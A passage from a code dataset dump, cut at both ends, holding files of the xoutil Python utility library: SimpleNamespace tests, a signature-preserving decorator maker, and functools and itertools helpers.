MAX_PASSWORD_SIZE\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 55, "blob_id": "072c2174a69ef48642710549701c5a70f983ac69", "content_id": "cf2b4a0fd3c66b3ecb9a657dfb7edbff9d23fd0f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 56, "license_type": "permissive", "max_line_length": 55, "num_lines": 1, "path": "/docs/source/history/_changes-1.9.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- `xoutil.context.NullContext`:class: is now a Mapping.\n" }, { "alpha_fraction": 0.5625, "alphanum_fraction": 0.5883767008781433, "avg_line_length": 29.882095336914062, "blob_id": "b95a6da4c60650e097d3bb622e2a9944bdb73514", "content_id": "353a1a72010f5222fb6433467f5a4b70d8adf97f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7073, "license_type": "no_license", "max_line_length": 79, "num_lines": 229, "path": "/tests/test_types.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\nimport pickle\n\nfrom xoutil.future import types\n\n\ndef test_iscollection():\n # TODO: move this test to equivalent for\n # `xoutil.values.simple.logic_collection_coerce`\n from xoutil.future.collections import UserList, UserDict\n\n def is_collection(arg):\n from collections import Iterable, Mapping\n\n avoid = (Mapping, str)\n return isinstance(arg, Iterable) and not isinstance(arg, avoid)\n\n assert is_collection(\"all strings are iterable\") is False\n assert is_collection(1) is False\n assert is_collection(range(1)) is True\n assert is_collection({}) is False\n assert is_collection(tuple()) is True\n assert is_collection(set()) is True\n assert is_collection(a for a in range(100)) is True\n\n class Foobar(UserList):\n pass\n\n assert is_collection(Foobar()) is True\n\n class Foobar(UserDict):\n pass\n\n assert is_collection(Foobar()) is False\n\n\nclass NoneTypeTests(unittest.TestCase):\n \"To avoid FlyCheck errors\"\n\n def test_identity(self):\n from xoutil.future.types import NoneType\n\n self.assertIs(NoneType, type(None))\n\n\nclass SimpleNamespaceTests(unittest.TestCase):\n def test_constructor(self):\n ns1 = types.SimpleNamespace()\n ns2 = types.SimpleNamespace(x=1, y=2)\n ns3 = types.SimpleNamespace(**dict(x=1, y=2))\n\n with self.assertRaises(TypeError):\n types.SimpleNamespace(1, 2, 3)\n\n self.assertEqual(len(ns1.__dict__), 0)\n self.assertEqual(vars(ns1), {})\n self.assertEqual(len(ns2.__dict__), 2)\n self.assertEqual(vars(ns2), {\"y\": 2, \"x\": 1})\n self.assertEqual(len(ns3.__dict__), 2)\n self.assertEqual(vars(ns3), {\"y\": 2, \"x\": 1})\n\n def test_unbound(self):\n ns1 = vars(types.SimpleNamespace())\n ns2 = vars(types.SimpleNamespace(x=1, y=2))\n\n self.assertEqual(ns1, {})\n self.assertEqual(ns2, {\"y\": 2, \"x\": 1})\n\n def test_underlying_dict(self):\n ns1 = types.SimpleNamespace()\n ns2 = types.SimpleNamespace(x=1, y=2)\n ns3 = types.SimpleNamespace(a=True, b=False)\n mapping = ns3.__dict__\n del ns3\n\n self.assertEqual(ns1.__dict__, {})\n self.assertEqual(ns2.__dict__, {\"y\": 2, \"x\": 1})\n self.assertEqual(mapping, dict(a=True, b=False))\n\n def test_attrget(self):\n ns = types.SimpleNamespace(x=1, y=2, w=3)\n\n self.assertEqual(ns.x, 1)\n self.assertEqual(ns.y, 2)\n self.assertEqual(ns.w, 3)\n with self.assertRaises(AttributeError):\n ns.z\n\n def test_attrset(self):\n ns1 = types.SimpleNamespace()\n ns2 = types.SimpleNamespace(x=1, y=2, w=3)\n ns1.a = \"spam\"\n ns1.b = \"ham\"\n ns2.z = 4\n ns2.theta = None\n\n self.assertEqual(ns1.__dict__, dict(a=\"spam\", b=\"ham\"))\n self.assertEqual(ns2.__dict__, dict(x=1, y=2, w=3, z=4, theta=None))\n\n def test_attrdel(self):\n ns1 = types.SimpleNamespace()\n ns2 = types.SimpleNamespace(x=1, y=2, w=3)\n\n with self.assertRaises(AttributeError):\n del ns1.spam\n with self.assertRaises(AttributeError):\n del ns2.spam\n\n del ns2.y\n self.assertEqual(vars(ns2), dict(w=3, x=1))\n ns2.y = \"spam\"\n self.assertEqual(vars(ns2), dict(w=3, x=1, y=\"spam\"))\n del ns2.y\n self.assertEqual(vars(ns2), dict(w=3, x=1))\n\n ns1.spam = 5\n self.assertEqual(vars(ns1), dict(spam=5))\n del ns1.spam\n self.assertEqual(vars(ns1), {})\n\n def test_repr(self):\n ns1 = types.SimpleNamespace(x=1, y=2, w=3)\n ns2 = types.SimpleNamespace()\n ns2.x = str(\"spam\")\n ns2._y = 5\n name = \"namespace\"\n\n self.assertEqual(repr(ns1), \"{name}(w=3, x=1, y=2)\".format(name=name))\n self.assertEqual(repr(ns2), \"{name}(_y=5, x='spam')\".format(name=name))\n\n def test_equal(self):\n ns1 = types.SimpleNamespace(x=1)\n ns2 = types.SimpleNamespace()\n ns2.x = 1\n\n self.assertEqual(types.SimpleNamespace(), types.SimpleNamespace())\n self.assertEqual(ns1, ns2)\n self.assertNotEqual(ns2, types.SimpleNamespace())\n\n def test_nested(self):\n ns1 = types.SimpleNamespace(a=1, b=2)\n ns2 = types.SimpleNamespace()\n ns3 = types.SimpleNamespace(x=ns1)\n ns2.spam = ns1\n ns2.ham = \"?\"\n ns2.spam = ns3\n\n self.assertEqual(vars(ns1), dict(a=1, b=2))\n self.assertEqual(vars(ns2), dict(spam=ns3, ham=\"?\"))\n self.assertEqual(ns2.spam, ns3)\n self.assertEqual(vars(ns3), dict(x=ns1))\n self.assertEqual(ns3.x.a, 1)\n\n def test_recursive(self):\n ns1 = types.SimpleNamespace(c=\"cookie\")\n ns2 = types.SimpleNamespace()\n ns3 = types.SimpleNamespace(x=1)\n ns1.spam = ns1\n ns2.spam = ns3\n ns3.spam = ns2\n\n self.assertEqual(ns1.spam, ns1)\n self.assertEqual(ns1.spam.spam, ns1)\n self.assertEqual(ns1.spam.spam, ns1.spam)\n self.assertEqual(ns2.spam, ns3)\n self.assertEqual(ns3.spam, ns2)\n self.assertEqual(ns2.spam.spam, ns2)\n\n def test_recursive_repr(self):\n ns1 = types.SimpleNamespace(c=str(\"cookie\"))\n ns2 = types.SimpleNamespace()\n ns3 = types.SimpleNamespace(x=1)\n ns1.spam = ns1\n ns2.spam = ns3\n ns3.spam = ns2\n name = \"namespace\"\n repr1 = \"{name}(c='cookie', spam={name}(...))\".format(name=name)\n repr2 = \"{name}(spam={name}(spam={name}(...), x=1))\".format(name=name)\n\n self.assertEqual(repr(ns1), repr1)\n self.assertEqual(repr(ns2), repr2)\n\n def test_as_dict(self):\n ns = types.SimpleNamespace(spam=\"spamspamspam\")\n\n with self.assertRaises(TypeError):\n len(ns)\n with self.assertRaises(TypeError):\n iter(ns)\n with self.assertRaises(TypeError):\n \"spam\" in ns\n with self.assertRaises(TypeError):\n ns[\"spam\"]\n\n def test_subclass(self):\n class Spam(types.SimpleNamespace):\n pass\n\n spam = Spam(ham=8, eggs=9)\n\n self.assertIs(type(spam), Spam)\n self.assertEqual(vars(spam), {\"ham\": 8, \"eggs\": 9})\n\n def test_pickle(self):\n ns = types.SimpleNamespace(breakfast=\"spam\", lunch=\"spam\")\n\n for protocol in range(pickle.HIGHEST_PROTOCOL + 1):\n pname = \"protocol {}\".format(protocol)\n try:\n ns_pickled = pickle.dumps(ns, protocol)\n except TypeError:\n raise TypeError(pname)\n ns_roundtrip = pickle.loads(ns_pickled)\n\n self.assertEqual(ns, ns_roundtrip, pname)\n\n\nclass TestDynamicClassAttribute(unittest.TestCase):\n def test_isimportable(self):\n from xoutil.future.types import DynamicClassAttribute # noqa\n" }, { "alpha_fraction": 0.5505775809288025, "alphanum_fraction": 0.5548704266548157, "avg_line_length": 32.89418029785156, "blob_id": "bd778dd49c4ec5d788280de30af79de3b63a785d", "content_id": "6418f2d91e3fa14f35ea1d126fb39930536b38e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12813, "license_type": "no_license", "max_line_length": 82, "num_lines": 378, "path": "/xotl/tools/decorator/meta.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Decorator-making facilities.\n\nThis module provides a signature-keeping version of the\n`xotl.tools.decorators.decorator`:func:, which is now deprecated in favor of\nthis module's version.\n\nWe scinded the decorator-making facilities from decorators per se to allow the\nmodule `xotl.tools.deprecation`:mod: to be used by decorators and at the same\ntime, implement the decorator `~xotl.tools.deprecation.deprecated`:func: more\neasily.\n\n\nThis module is an adapted work from the decorator version 3.3.2 package and is\ncopyright of its owner as stated below. Adaptation work is done by Merchise.\n\nOriginal copyright and license notices from decorator package:\n\n Copyright (c) 2005-2011, Michele Simionato\n\n All rights reserved.\n\n Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer. Redistributions in\n bytecode form must reproduce the above copyright notice, this list of\n conditions and the following disclaimer in the documentation and/or other\n materials provided with the distribution.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE\n LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\n\nimport sys\nimport re\nimport inspect\n\nfrom functools import wraps, partial\nfrom types import FunctionType as function\n\nfrom inspect import getfullargspec as _getfullargspec\n\n__all__ = (\"FunctionMaker\", \"flat_decorator\", \"decorator\")\n\n\nDEF = re.compile(r\"\\s*def\\s*([_\\w][_\\w\\d]*)\\s*\\(\")\n\n\n# basic functionality\nclass FunctionMaker:\n \"\"\"\n An object with the ability to create functions with a given signature.\n It has attributes name, doc, module, signature, defaults, dict and\n methods update and make.\n \"\"\"\n\n def __init__(\n self,\n func=None,\n name=None,\n signature=None,\n defaults=None,\n doc=None,\n module=None,\n funcdict=None,\n ):\n self.shortsignature = signature\n if func:\n # func can be a class or a callable, but not an instance method\n self.name = func.__name__\n if self.name == \"<lambda>\": # small hack for lambda functions\n self.name = \"_lambda_\"\n self.doc = func.__doc__\n self.module = func.__module__\n if inspect.isfunction(func):\n argspec = _getfullargspec(func)\n for a in (\n \"args\",\n \"varargs\",\n \"varkw\",\n \"defaults\",\n \"kwonlyargs\",\n \"kwonlydefaults\",\n \"annotations\",\n ):\n setattr(self, a, getattr(argspec, a, None))\n for i, arg in enumerate(self.args):\n setattr(self, \"arg%d\" % i, arg)\n self.signature = inspect.formatargspec(\n formatvalue=lambda val: \"\", *argspec\n )[1:-1]\n allargs = list(self.args)\n if self.varargs:\n allargs.append(\"*\" + self.varargs)\n if self.varkw:\n allargs.append(\"**\" + self.varkw)\n try:\n self.shortsignature = \", \".join(allargs)\n except TypeError:\n # exotic signature, valid only in Python 2.X\n self.shortsignature = self.signature\n self.dict = func.__dict__.copy()\n # func=None happens when decorating a caller\n if name:\n self.name = name\n if signature is not None:\n self.signature = signature\n if defaults:\n self.defaults = defaults\n if doc:\n self.doc = doc\n if module:\n self.module = module\n if funcdict:\n self.dict = funcdict\n # check existence required attributes\n assert hasattr(self, \"name\")\n if not hasattr(self, \"signature\"):\n raise TypeError(\"You are decorating a non function: %s\" % func)\n\n def update(self, func, **kw):\n \"Update the signature of func with the data in self\"\n func.__name__ = self.name\n func.__doc__ = getattr(self, \"doc\", None)\n func.__dict__ = getattr(self, \"dict\", {})\n func.func_defaults = getattr(self, \"defaults\", ())\n func.__kwdefaults__ = getattr(self, \"kwonlydefaults\", None)\n callermodule = sys._getframe(3).f_globals.get(\"__name__\", \"?\")\n func.__module__ = getattr(self, \"module\", callermodule)\n func.__dict__.update(kw)\n\n def make(self, src_templ, evaldict=None, addsource=False, **attrs):\n \"Make a new function from a given template and update the signature\"\n src = src_templ % vars(self) # expand name and signature\n evaldict = evaldict or {}\n mo = DEF.match(src)\n if mo is None:\n raise SyntaxError(\"not a valid function template\\n%s\" % src)\n name = mo.group(1) # extract the function name\n names = set(\n [name] + [arg.strip(\" *\") for arg in self.shortsignature.split(\",\")]\n )\n for n in names:\n if n in (\"_func_\", \"_call_\"):\n raise NameError(\"%s is overridden in\\n%s\" % (n, src))\n if not src.endswith(\"\\n\"): # add a newline just for safety\n src += \"\\n\" # this is needed in old versions of Python\n try:\n code = compile(src, \"<string>\", \"single\")\n eval(code, evaldict, evaldict)\n except Exception:\n raise\n func = evaldict[name]\n if addsource:\n attrs[\"__source__\"] = src\n self.update(func, **attrs)\n return func\n\n @classmethod\n def create(\n cls,\n obj,\n body,\n evaldict,\n defaults=None,\n doc=None,\n module=None,\n addsource=True,\n **attrs\n ):\n \"\"\"\n Create a function from the strings name, signature and body.\n \"evaldict\" is the evaluation dictionary. If addsource is true an\n attribute __source__ is added to the result. The attributes attrs are\n added,\n if any.\n \"\"\"\n if isinstance(obj, str): # \"name(signature)\"\n obj = str(obj)\n name, rest = obj.strip().split(str(\"(\"), 1)\n signature = rest[:-1] # strip a right parens\n func = None\n else: # a function\n name = None\n signature = None\n func = obj\n self = cls(func, name, signature, defaults, doc, module)\n ibody = \"\\n\".join(\" \" + line for line in body.splitlines())\n return self.make(\n \"def %(name)s(%(signature)s):\\n\" + ibody, evaldict, addsource, **attrs\n )\n\n\ndef flat_decorator(caller, func=None):\n \"\"\"Creates a signature keeping decorator.\n\n ``decorator(caller)`` converts a caller function into a decorator.\n\n ``decorator(caller, func)`` decorates a function using a caller.\n\n .. deprecated:: 1.9.9 Use the `decorator\n <https://pypi.org/project/decorator/>`__ package.\n\n \"\"\"\n if func is not None: # returns a decorated function\n evaldict = func.__globals__.copy()\n evaldict[\"_call_\"] = caller\n evaldict[\"_func_\"] = func\n return FunctionMaker.create(\n func,\n \"return _call_(_func_, %(shortsignature)s)\",\n evaldict,\n undecorated=func,\n __wrapped__=func,\n )\n else: # returns a decorator\n if isinstance(caller, partial):\n return partial(decorator, caller)\n # otherwise assume caller is a function\n try:\n first = inspect.getargspec(caller)[0][0] # first arg\n deco_sign = \"%s(%s)\" % (caller.__name__, first)\n deco_body = \"return flat_decorator(_call_, %s)\" % first\n except IndexError:\n deco_sign = \"%s()\" % caller.__name__\n deco_body = \"return _call_\"\n evaldict = caller.__globals__.copy()\n evaldict[\"_call_\"] = caller\n evaldict[\"flat_decorator\"] = evaldict[\"decorator\"] = flat_decorator\n return FunctionMaker.create(\n deco_sign,\n deco_body,\n evaldict,\n undecorated=caller,\n __wrapped__=caller,\n doc=caller.__doc__,\n module=caller.__module__,\n )\n\n\n# -- End of decorators package\n\n\n# FIX: This meta-decorator fails in some scenarios (old classes?)\ndef decorator(caller):\n \"\"\"Eases the creation of decorators with arguments. Normally a decorator\n with arguments needs three nested functions like this::\n\n def decorator(*decorator_arguments):\n def real_decorator(target):\n def inner(*args, **kwargs):\n return target(*args, **kwargs)\n return inner\n return real_decorator\n\n This decorator reduces the need of the first level by comprising both into\n a single function definition. However it does not removes the need for an\n ``inner`` function::\n\n >>> @decorator\n ... def plus(target, value):\n ... from functools import wraps\n ... @wraps(target)\n ... def inner(*args):\n ... return target(*args) + value\n ... return inner\n\n >>> @plus(10)\n ... def ident(val):\n ... return val\n\n >>> ident(1)\n 11\n\n A decorator with default values for all its arguments (except, of course,\n the first one which is the decorated `target`) may be invoked\n without parenthesis::\n\n >>> @decorator\n ... def plus2(func, value=1, missing=2):\n ... from functools import wraps\n ... @wraps(func)\n ... def inner(*args):\n ... print(missing)\n ... return func(*args) + value\n ... return inner\n\n >>> @plus2\n ... def ident2(val):\n ... return val\n\n >>> ident2(10)\n 2\n 11\n\n But (if you like) you may place the parenthesis::\n\n >>> @plus2()\n ... def ident3(val):\n ... return val\n\n >>> ident3(10)\n 2\n 11\n\n However, this is not for free, you cannot pass a single positional argument\n which type is a function::\n\n >>> def p():\n ... print('This is p!!!')\n\n >>> @plus2(p) # doctest: +ELLIPSIS\n ... def dummy():\n ... print('This is dummy')\n Traceback (most recent call last):\n ...\n TypeError: p() takes ...\n\n The workaround for this case is to use a keyword argument.\n \"\"\"\n\n @wraps(caller)\n def outer_decorator(*args, **kwargs):\n try:\n from zope.interface import Interface\n except ImportError:\n Interface = None\n # from xotl.tools.symbols import Unset as Interface\n if (\n len(args) == 1\n and not kwargs\n and (\n isinstance(args[0], (function, type))\n or issubclass(type(args[0]), type(Interface))\n )\n ):\n # This tries to solve the case of missing () on the decorator::\n #\n # @decorator\n # def somedec(func, *args, **kwargs)\n # ...\n #\n # @somedec\n # def decorated(*args, **kwargs):\n # pass\n #\n # Notice, however, that this is not general enough, since we try\n # to avoid inspecting the calling frame to see if the () are in\n # place.\n func = args[0]\n return caller(func)\n elif len(args) > 0 or len(kwargs) > 0:\n\n def _decorator(func):\n return partial(caller, **kwargs)(*((func,) + args))\n\n return _decorator\n else:\n return caller\n\n return outer_decorator\n" }, { "alpha_fraction": 0.5538879632949829, "alphanum_fraction": 0.5607489943504333, "avg_line_length": 29.55021858215332, "blob_id": "64fffa18754fc275ead0f0137a71b7603d1ebc34", "content_id": "50dad537ce44b3f625400a59fb812530c981ddf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6997, "license_type": "no_license", "max_line_length": 78, "num_lines": 229, "path": "/xotl/tools/future/functools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to the `functools` module from the Python's standard library.\n\nYou may use this module as drop-in replacement of `functools`.\n\n\"\"\"\nfrom functools import * # noqa\nfrom functools import _CacheInfo # noqa\n\n\n# TODO: Check relevance of the following function.\n# The real signature should be (*funcs, times)\ndef power(*args):\n \"\"\"Returns the \"power\" composition of several functions.\n\n Examples::\n\n >>> import operator\n >>> f = power(partial(operator.mul, 3), 3)\n >>> f(23) == 3*(3*(3*23))\n True\n\n >>> power(operator.neg)\n Traceback (most recent call last):\n ...\n TypeError: power() takes at least 2 arguments (1 given)\n\n \"\"\"\n from xotl.tools.params import check_count\n from xotl.tools.fp.tools import compose\n\n check_count(args, 2, caller=\"power\")\n *funcs, times = args\n if any(not callable(func) for func in funcs):\n raise TypeError(\"Arguments of `power`, but last, must be callables\")\n if not (isinstance(times, int) and times > 0):\n raise TypeError(\"Last argument of `power` must be a positive integer\")\n if len(funcs) > 1:\n base = (compose(funcs),)\n else:\n base = (funcs[0],)\n return compose(*(base * times))\n\n\ndef lwraps(*args, **kwargs):\n \"\"\"Lambda wrapper.\n\n Useful for decorate lambda functions with name and documentation.\n\n As positional arguments could be passed the function to be decorated and\n the name in any order. So the next two ``identity`` definitions are\n equivalents::\n\n >>> from xotl.tools.future.functools import lwraps as lw\n\n >>> identity = lw('identity', lambda arg: arg)\n\n >>> identity = lw(lambda arg: arg, 'identity')\n\n As keyword arguments could be passed some special values, and any number\n of literal values to be assigned:\n\n - **name**: The name of the function (``__name__``); only valid if not\n given as positional argument.\n\n - **doc**: The documentation (``__doc__`` field).\n\n - **wrapped**: An object to extract all values not yet assigned. These\n values are ('__module__', '__name__' and '__doc__') to be assigned, and\n '__dict__' to be updated.\n\n If the function to decorate is present in the positional arguments, this\n same argument function is directly returned after decorated; if not a\n decorator is returned similar to standard `wraps`:func:.\n\n For example::\n\n >>> from xotl.tools.future.functools import lwraps as lw\n\n >>> is_valid_age = lw('is-valid-human-age', lambda age: 0 < age <= 120,\n ... doc=('A predicate to evaluate if an age is '\n ... 'valid for a human being.')\n\n >>> @lw(wrapped=is_valid_age)\n ... def is_valid_working_age(age):\n ... return 18 < age <= 70\n\n >>> is_valid_age(16)\n True\n\n >>> is_valid_age(200)\n False\n\n >>> is_valid_working_age(16)\n False\n\n .. versionadded:: 1.7.0\n\n \"\"\"\n from types import FunctionType, MethodType\n from xotl.tools.symbols import Unset\n from xotl.tools.params import check_count\n\n def repeated(name):\n msg = \"lwraps got multiple values for argument '{}'\"\n raise TypeError(msg.format(name))\n\n def settle_str(name, value):\n if value is not Unset:\n if isinstance(value, str):\n if name not in source:\n source[name] = value\n else:\n repeated(name)\n else:\n msg = 'lwraps expecting string for \"{}\", {} found'\n raise TypeError(msg.format(name, type(value).__name__))\n\n methods = (staticmethod, classmethod, MethodType)\n decorables = methods + (FunctionType,)\n\n name_key = \"__name__\"\n doc_key = \"__doc__\"\n mod_key = \"__module__\"\n safes = {name_key, mod_key}\n source = {}\n target = Unset\n count = len(args)\n check_count(count, 0, 2, caller=\"lwraps\")\n i = 0\n while i < count:\n arg = args[i]\n if isinstance(arg, str):\n settle_str(name_key, arg)\n elif isinstance(arg, decorables):\n if target is Unset:\n target = arg\n else:\n repeated(\"target-function\")\n else:\n msg = \"lwraps arg {} must be a string or decorable function\"\n raise TypeError(msg.format(i))\n i += 1\n wrapped = kwargs.pop(\"wrapped\", Unset)\n settle_str(name_key, kwargs.pop(\"name\", Unset))\n settle_str(name_key, kwargs.pop(name_key, Unset))\n settle_str(doc_key, kwargs.pop(\"doc\", Unset))\n settle_str(doc_key, kwargs.pop(doc_key, Unset))\n source.update(kwargs)\n if wrapped is not Unset:\n # TODO: Check the type of `wrapped` to find these attributes in\n # disparate callable objects similarly with functions.\n for name in (mod_key, name_key, doc_key):\n if name not in source:\n source[str(name)] = getattr(wrapped, name)\n d = source.setdefault(\"__dict__\", {})\n d.update(wrapped.__dict__)\n\n def wrapper(target):\n if isinstance(target, decorables):\n res = target\n if isinstance(target, methods):\n target = target.__func__\n for name in (mod_key, name_key, doc_key):\n if name in source:\n value = source.pop(name)\n if name in safes:\n value = str(value)\n setattr(target, str(name), value)\n d = source.pop(\"__dict__\", Unset)\n if d:\n target.__dict__.update(d)\n for key in source:\n setattr(target, key, source[key])\n return res\n else:\n msg = \"only functions are decorated, not {}\"\n raise TypeError(msg.format(type(target).__name__))\n\n return wrapper(target) if target else wrapper\n\n # TODO: Next code could be removed.\n # func.__name__ = string.force(name)\n # if doc:\n # func.__doc__ = doc\n # return func\n\n\ndef curry(f):\n \"\"\"Return a function that automatically 'curries' is positional arguments.\n\n Example::\n\n >>> add = curry(lambda x, y: x + y)\n >>> add(1)(2)\n 3\n\n >>> add(1, 2)\n 3\n\n >>> add()()()(1, 2)\n 3\n \"\"\"\n from xotl.tools.future.inspect import getfullargspec\n\n fargs = getfullargspec(f)[0]\n\n def curried(cargs=None):\n if cargs is None:\n cargs = []\n\n def inner(*args, **kwargs):\n cargs_ = cargs + list(args)\n if len(cargs_) < len(fargs):\n return curried(cargs_)\n else:\n return f(*cargs_, **kwargs)\n\n return inner\n\n return curried()\n" }, { "alpha_fraction": 0.5519999861717224, "alphanum_fraction": 0.5635789632797241, "avg_line_length": 27.787878036499023, "blob_id": "7b58ad00e286756749a14619d0bbeb01f7683b60", "content_id": "016d3d47cdd9c8705f78aeb35ea42691152f3d6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14257, "license_type": "no_license", "max_line_length": 91, "num_lines": 495, "path": "/xotl/tools/future/itertools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Several util functions for iterators.\n\n.. versionchanged:: 1.8.4 Renamed to `xotl.tools.future.iterator`:mod:. The\n ``xotl.tools.iterators`` is now a deprecated alias.\n\n\"\"\"\nimport sys\nfrom itertools import * # noqa\nfrom xotl.tools.symbols import Unset\nfrom xotl.tools.deprecation import deprecated_alias, deprecated\n\nmap = deprecated_alias(map, removed_in_version=\"3.0\", check_version=True)\nzip = deprecated_alias(zip, removed_in_version=\"3.0\", check_version=True)\n\n\ndef first_non_null(iterable, default=None):\n \"\"\"Returns the first value from iterable which is non-null.\n\n This is roughly the same as::\n\n next((x for x in iter(iterable) if x), default)\n\n .. versionadded:: 1.4.0\n\n \"\"\"\n return next((x for x in iter(iterable) if x), default)\n\n\ndef flatten(sequence, is_scalar=None, depth=None):\n \"\"\"Flatten-out a sequence.\n\n It takes care of everything deemed a collection (i.e, not a scalar\n according to the callable passed in `is_scalar` argument; if ``None``,\n iterables -but strings- will be considered as scalars.\n\n For example::\n\n >>> range_ = lambda *a: list(range(*a))\n >>> tuple(flatten((1, range_(2, 5), range(5, 10))))\n (1, 2, 3, 4, 5, 6, 7, 8, 9)\n\n If `depth` is None the collection is flattened recursively until the\n \"bottom\" is reached. If `depth` is an integer then the collection is\n flattened up to that level. `depth=0` means not to flatten. Nested\n iterators are not \"exploded\" if under the stated `depth`::\n\n # In the following doctest we use ``...range(...X)`` because the\n # string repr of range differs in Py2 and Py3k.\n\n >>> tuple(flatten((range_(2), range(2, 4)), depth=0)) # doctest: +ELLIPSIS # noqa\n ([0, 1], ...range(2, 4))\n\n >>> tuple(flatten((range(2), range_(2, 4)), depth=0)) # doctest: +ELLIPSIS # noqa\n (...range(...2), [2, 3])\n\n .. note:: Compatibility issue\n\n In Python 2 ``bytes`` is the standard string but in Python 3 is a\n binary buffer, so ``flatten([b'abc', [1, 2, 3]])`` will deliver\n different results.\n\n \"\"\"\n if is_scalar is None:\n\n def is_scalar(maybe):\n \"\"\"Returns if `maybe` is not not an iterable or a string.\"\"\"\n from collections import Iterable\n\n return isinstance(maybe, str) or not isinstance(maybe, Iterable)\n\n for item in sequence:\n if is_scalar(item):\n yield item\n elif depth == 0:\n yield item\n else:\n if depth is not None:\n depth = depth - 1\n for subitem in flatten(item, is_scalar, depth=depth):\n yield subitem\n\n\ndef pop_first(source, keys, default=None):\n \"\"\"Pop first value from `source` from given `keys`.\n\n :param source: Any compatible mapping.\n\n :param keys: Reference keys to pop the value.\n\n Examples::\n\n >>> d = {'x': 1, 'y': 2, 'z': 3}\n >>> pop_first(d, ('a', 'y', 'x'), '---')\n 2\n\n >>> pop_first(d, ('a', 'y', 'x'), '---')\n 1\n\n >>> pop_first(d, ('a', 'y', 'x'), '---')\n '---'\n\n \"\"\"\n return next((source.pop(key) for key in keys if key in source), default)\n\n\ndef multi_pop(source, *keys):\n \"\"\"Pop values from `source` of all given `keys`.\n\n :param source: Any compatible mapping.\n\n :param keys: Keys to pop values.\n\n All keys that are not found are ignored.\n\n Examples::\n\n >>> d = {'x': 1, 'y': 2, 'z': 3}\n >>> next(multi_pop(d, 'a', 'y', 'x'), '---')\n 2\n\n >>> next(multi_pop(d, 'a', 'y', 'x'), '---')\n 1\n\n >>> next(multi_pop(d, 'a', 'y', 'x'), '---')\n '---'\n\n \"\"\"\n return (source.pop(key) for key in keys if key in source)\n\n\ndef multi_get(source, *keys):\n \"\"\"Get values from `source` of all given `keys`.\n\n :param source: Any compatible mapping.\n\n :param keys: Keys to get values.\n\n All keys that are not found are ignored.\n\n Examples::\n\n >>> d = {'x': 1, 'y': 2, 'z': 3}\n >>> next(multi_get(d, 'a', 'y', 'x'), '---')\n 2\n\n >>> next(multi_get(d, 'a', 'y', 'x'), '---')\n 2\n\n >>> next(multi_get(d, 'a', 'b'), '---')\n '---'\n\n \"\"\"\n return (source.get(key) for key in keys if key in source)\n\n\ndef dict_update_new(target, source, fail=False):\n \"\"\"Update values in `source` that are new (not present) in `target`.\n\n If `fail` is True and a value is already set, an error is raised.\n\n \"\"\"\n for key in source:\n if key not in target:\n target[key] = source[key]\n elif fail:\n raise TypeError('key \"{}\" already in target'.format(key))\n\n\ndef delete_duplicates(seq, key=lambda x: x):\n \"\"\"Remove all duplicate elements from `seq`.\n\n Two items ``x`` and ``y`` are considered equal (duplicates) if\n ``key(x) == key(y)``. By default `key` is the identity function.\n\n Works with any sequence that supports `len`:func:,\n `~object.__getitem__`:meth:, and `addition <object.__add__>`:meth:.\n\n .. note:: ``seq.__getitem__`` should work properly with slices.\n\n The return type will be the same as that of the original sequence.\n\n .. versionadded:: 1.5.5\n\n .. versionchanged:: 1.7.4 Added the `key` argument. Clarified the\n documentation: `seq` should also implement the ``__add__`` method and\n that its ``__getitem__`` method should deal with slices.\n\n \"\"\"\n i, done = 0, set()\n while i < len(seq):\n k = key(seq[i])\n if k not in done:\n done.add(k)\n i += 1\n else:\n seq = seq[:i] + seq[i + 1 :]\n return seq\n\n\ndef 